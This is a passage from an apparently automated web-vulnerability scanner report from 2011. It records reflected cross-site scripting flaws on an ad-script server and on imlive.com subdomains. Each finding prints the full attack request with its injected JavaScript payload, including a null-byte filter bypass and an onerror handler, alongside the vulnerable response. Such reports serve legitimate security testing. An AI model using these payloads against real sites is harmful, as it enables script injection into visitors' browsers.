GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true6405c'%3balert(1)//18d1dd4323b&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2678

function Initd8941df0_7cc9_48cf_a64e_d6fb8bb75570(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivd8941df0_7cc9_48cf_a64e_d6fb8bb75570';
       playerDiv.setAttribute(
...[SNIP]...
m.de18_1%3bbtg%3dcm.sports_h%3bbtg%3dcm.weath_l%3bbtg%3dbk.rdst1%3bbtg%3dex.32%3bbtg%3dex.76%3bbtg%3dqc.a%3b%7eaopt%3d3%2f0%2fee%2f0%3b%7esscs%3d%3f%22%7d');
       playerDiv.setAttribute("impolite", 'true6405c';alert(1)//18d1dd4323b');
       playerDiv.setAttribute("expandedMode",'');


       var absentBody = false;

       if (document.getElementsByTagName("head").length == 0){
           var head = document.createElement("head");
           var
...[SNIP]...

4.722. http://raw.oggifinogi.com/GetScript.aspx [oggiSite parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4322'%3balert(1)//880bad4c955 was submitted in the oggiSite parameter. This input was echoed as a4322';alert(1)//880bad4c955 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=8a1e14f9-0430-4899-bc31-63608f1bee92&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=d12ec800-d902-472d-9d0d-8a77a14a4187&oggiVary=&oggiImpolite=true&oggiClickTrack=http://media.fastclick.net/w/click.here?cid=279384&mid=521626&m=1&sid=54393&c=0&tp=5&forced_click=&oggiIsIframe=1&oggiSite=http%3A//www.bostonherald.com/track/a4322'%3balert(1)//880bad4c955 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:55:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2110

function Init6c9d51ce_ebb3_47b3_9d1f_8f7021d9283c(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv6c9d51ce_ebb3_47b3_9d1f_8f7021d9283c';
       playerDiv.setAttribute(
...[SNIP]...
6tp%3d5%26forced_click%3d%22%7d');
       playerDiv.setAttribute("impolite", 'true');
       playerDiv.setAttribute("expandedMode",'');
       playerDiv.setAttribute("referrer", 'http://www.bostonherald.com/track/a4322';alert(1)//880bad4c955');window.isIframe = true;

       var absentBody = false;

       if (document.getElementsByTagName("head").length == 0){
           var head = document.createElement("head");
           var html = document.getElements
...[SNIP]...

4.723. http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiVary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a182"%3balert(1)//e1b39971356 was submitted in the oggiVary parameter. This input was echoed as 7a182";alert(1)//e1b39971356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=7a182"%3balert(1)//e1b39971356&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Initb42795e8_a512_4e2d_af51_815adee5da41(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivb42795e8_a512_4e2d_af51_815adee5da41';
       playerDiv.setAttribute(
...[SNIP]...
<scr" + "ipt type='text/javascript' src='http://static-cdn-cf.oggifinogi.com/prod/PlayerLoader7a182";alert(1)//e1b39971356_4.9.9_2011_01_12.js'>
...[SNIP]...

4.724. http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiVary request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4ea'%3balert(1)//c6fa5b63d0 was submitted in the oggiVary parameter. This input was echoed as 9e4ea';alert(1)//c6fa5b63d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=9e4ea'%3balert(1)//c6fa5b63d0&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2704

function Init77050115_b488_400e_8d8a_f4f42215e5f6(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv77050115_b488_400e_8d8a_f4f42215e5f6';
       playerDiv.setAttribute(
...[SNIP]...
c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef');
       playerDiv.style.cssText = 'width:300px;height:250px; position:absolute;text-align:left;';
       playerDiv.setAttribute("vary", '9e4ea';alert(1)//c6fa5b63d0');
       playerDiv.setAttribute("gExternal", '%7b%22link1%22%3a%22http%3a%2f%2fwww.bestbuybusiness.com%2fbbfb%2fen%2fUS%2fadirect%2fbestbuy%3fcmd%3dBBFBStaticContent%26id%3dcontent%2fcatalog%2ftruesoluti
...[SNIP]...

4.725. http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiWidth request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fca5'%3balert(1)//6b02666133 was submitted in the oggiWidth parameter. This input was echoed as 4fca5';alert(1)//6b02666133 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px4fca5'%3balert(1)//6b02666133&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2704

function Initb6eb1445_e00f_4076_8278_5045fedb286c(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivb6eb1445_e00f_4076_8278_5045fedb286c';
       playerDiv.setAttribute(
...[SNIP]...
Url", 'http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef');
       playerDiv.style.cssText = 'width:300px4fca5';alert(1)//6b02666133;height:250px; position:absolute;text-align:left;';
       playerDiv.setAttribute("vary", '');
       playerDiv.setAttribute("gExternal", '%7b%22link1%22%3a%22http%3a%2f%2fwww.bestbuybusiness.com%2fbbfb%2fen%2
...[SNIP]...

4.726. http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiWidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c3e"%3balert(1)//0b5372e35f5 was submitted in the oggiWidth parameter. This input was echoed as 60c3e";alert(1)//0b5372e35f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px60c3e"%3balert(1)//0b5372e35f5&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Initbc98c806_2c1e_48b1_9d3c_28ad71063ff3(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDivbc98c806_2c1e_48b1_9d3c_28ad71063ff3';
       playerDiv.setAttribute(
...[SNIP]...
<div id='oggiPlaceholderbc98c806_2c1e_48b1_9d3c_28ad71063ff3' style='width:300px60c3e";alert(1)//0b5372e35f5;height:250px;'>
...[SNIP]...

4.727. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: spvdr=vd=591f9b95-a40e-412c-8b3f-904dd62e2a06&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21036
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.728. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
Set-Cookie: spvdr=vd=ca385023-6a55-4da9-9adc-27df877ab4ee&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 21515
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00ba898"><script>alert(1)</script>ea1f44e02c1~1');return false;">
...[SNIP]...

4.729. http://ru.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=ru.imlive.com&ul=/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://ru.imlive.com:80/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.730. http://se.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
